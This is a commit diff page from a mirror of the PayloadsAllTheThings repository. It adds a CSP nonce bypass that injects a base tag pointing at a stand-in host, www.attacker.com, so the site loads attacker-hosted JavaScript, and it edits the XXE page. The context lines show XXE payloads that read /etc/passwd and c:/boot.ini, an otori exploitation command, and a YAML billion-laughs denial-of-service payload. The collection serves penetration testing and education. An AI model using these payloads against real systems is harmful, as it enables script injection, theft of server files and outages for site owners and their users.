mirror of
https://github.com/swisskyrepo/PayloadsAllTheThings.git
synced 2024-12-18 10:26:09 +00:00
Bypass CSP, technique from #715
This commit is contained in:
parent
d0c4454ef2
commit
9866fef5b4
@ -83,6 +83,8 @@
|
||||
- [Bypass CSP unsafe-inline](#bypass-csp-unsafe-inline)
|
||||
- [Bypass CSP script-src self](#bypass-csp-script-src-self)
|
||||
- [Bypass CSP script-src data](#bypass-csp-script-src-data)
|
||||
- [Bypass CSP nonce](#bypass-csp-nonce)
|
||||
- [Bypass CSP header sent by PHP](#bypass-csp-header-sent-by-php)
|
||||
- [References](#references)
|
||||
|
||||
## Vulnerability Details
|
||||
@ -1308,6 +1310,26 @@ Source: [@404death](https://twitter.com/404death/status/1191222237782659072)
|
||||
```
|
||||
|
||||
|
||||
### Bypass CSP nonce
|
||||
|
||||
**Requirements**:
|
||||
|
||||
* CSP like `script-src 'nonce-RANDOM_NONCE'`
|
||||
* Imported JS file with a relative link: `<script src='/PATH.js'></script>`
|
||||
|
||||
|
||||
**Payload**:
|
||||
|
||||
1. Inject a base tag.
|
||||
```html
|
||||
<base href=http://www.attacker.com>
|
||||
```
|
||||
2. Host your custom js file at the same path that one of the website's script.
|
||||
```
|
||||
http://www.attacker.com/PATH.js
|
||||
```
|
||||
|
||||
|
||||
### Bypass CSP header sent by PHP
|
||||
|
||||
**Requirements**:
|
||||
|
@ -2,10 +2,10 @@
|
||||
|
||||
> An XML External Entity attack is a type of attack against an application that parses XML input and allows XML entities. XML entities can be used to tell the XML parser to fetch specific content on the server.
|
||||
|
||||
**Internal Entity**: If an entity is declared within a DTD it is called as internal entity.
|
||||
**Internal Entity**: If an entity is declared within a DTD it is called an internal entity.
|
||||
Syntax: `<!ENTITY entity_name "entity_value">`
|
||||
|
||||
**External Entity**: If an entity is declared outside a DTD it is called as external entity. Identified by `SYSTEM`.
|
||||
**External Entity**: If an entity is declared outside a DTD it is called an external entity. Identified by `SYSTEM`.
|
||||
Syntax: `<!ENTITY entity_name SYSTEM "entity_value">`
|
||||
|
||||
## Summary
|
||||
@ -19,9 +19,9 @@ Syntax: `<!ENTITY entity_name SYSTEM "entity_value">`
|
||||
- [PHP Wrapper inside XXE](#php-wrapper-inside-xxe)
|
||||
- [XInclude attacks](#xinclude-attacks)
|
||||
- [Exploiting XXE to perform SSRF attacks](#exploiting-xxe-to-perform-SSRF-attacks)
|
||||
- [Exploiting XXE to perform a deny of service](#exploiting-xxe-to-perform-a-deny-of-service)
|
||||
- [Exploiting XXE to perform a denial of service](#exploiting-xxe-to-perform-a-denial-of-service)
|
||||
- [Billion Laugh Attack](#billion-laugh-attack)
|
||||
- [Yaml attack](#yaml-attack)
|
||||
- [YAML attack](#yaml-attack)
|
||||
- [Parameters Laugh attack](#parameters-laugh-attack)
|
||||
- [Exploiting Error Based XXE](#exploiting-error-based-xxe)
|
||||
- [Error Based - Using Local DTD File](#error-based---using-local-dtd-file)
|
||||
@ -91,7 +91,7 @@ Syntax: `<!ENTITY entity_name SYSTEM "entity_value">`
|
||||
```
|
||||
- [otori](http://www.beneaththewaves.net/Software/On_The_Outside_Reaching_In.html) - Toolbox intended to allow useful exploitation of XXE vulnerabilities.
|
||||
```ps1
|
||||
python ./otori.py --clone --module "G-XXE-Basic" --singleuri "file:///etc/passwd" --module-options "TEMPLATEFILE" "TARGETURL" "BASE64ENCODE" "DOCTYPE" "XMLTAG" --outputbase "./output-generic-solr" --overwrite --noerrorfiles --noemptyfiles --nowhitespacefiles --noemptydirs
|
||||
python ./otori.py --clone --module "G-XXE-Basic" --singleuri "file:///etc/passwd" --module-options "TEMPLATEFILE" "TARGETURL" "BASE64ENCODE" "DOCTYPE" "XMLTAG" --outputbase "./output-generic-solr" --overwrite --noerrorfiles --noemptyfiles --nowhitespacefiles --noemptydirs
|
||||
```
|
||||
|
||||
## Labs
|
||||
@ -145,14 +145,14 @@ We try to display the content of the file `/etc/passwd`.
|
||||
|
||||
```xml
|
||||
<?xml version="1.0" encoding="ISO-8859-1"?>
|
||||
<!DOCTYPE foo [
|
||||
<!DOCTYPE foo [
|
||||
<!ELEMENT foo ANY >
|
||||
<!ENTITY xxe SYSTEM "file:///etc/passwd" >]><foo>&xxe;</foo>
|
||||
```
|
||||
|
||||
```xml
|
||||
<?xml version="1.0" encoding="ISO-8859-1"?>
|
||||
<!DOCTYPE foo [
|
||||
<!DOCTYPE foo [
|
||||
<!ELEMENT foo ANY >
|
||||
<!ENTITY xxe SYSTEM "file:///c:/boot.ini" >]><foo>&xxe;</foo>
|
||||
```
|
||||
@ -219,7 +219,7 @@ XXE can be combined with the [SSRF vulnerability](https://github.com/swisskyrepo
|
||||
```
|
||||
|
||||
|
||||
## Exploiting XXE to perform a deny of service
|
||||
## Exploiting XXE to perform a denial of service
|
||||
|
||||
:warning: : These attacks might kill the service or the server, do not use them on the production.
|
||||
|
||||
@ -236,7 +236,7 @@ XXE can be combined with the [SSRF vulnerability](https://github.com/swisskyrepo
|
||||
<data>&a4;</data>
|
||||
```
|
||||
|
||||
### Yaml attack
|
||||
### YAML attack
|
||||
|
||||
```xml
|
||||
a: &a ["lol","lol","lol","lol","lol","lol","lol","lol","lol"]
|
||||
@ -491,7 +491,7 @@ XML parsers uses 4 methods to detect encoding:
|
||||
* XML declaration: `<?xml version="1.0" encoding="UTF-8"?>`
|
||||
|
||||
| Encoding | BOM | Example | |
|
||||
|----------|----------|-------------------------------------|--------------|
|
||||
| -------- | -------- | ----------------------------------- | ------------ |
|
||||
| UTF-8 | EF BB BF | EF BB BF 3C 3F 78 6D 6C | ...<?xml |
|
||||
| UTF-16BE | FE FF | FE FF 00 3C 00 3F 00 78 00 6D 00 6C | ...<.?.x.m.l |
|
||||
| UTF-16LE | FF FE | FF FE 3C 00 3F 00 78 00 6D 00 6C 00 | ..<.?.x.m.l. |
|
||||
|
Loading…
Reference in New Issue
Block a user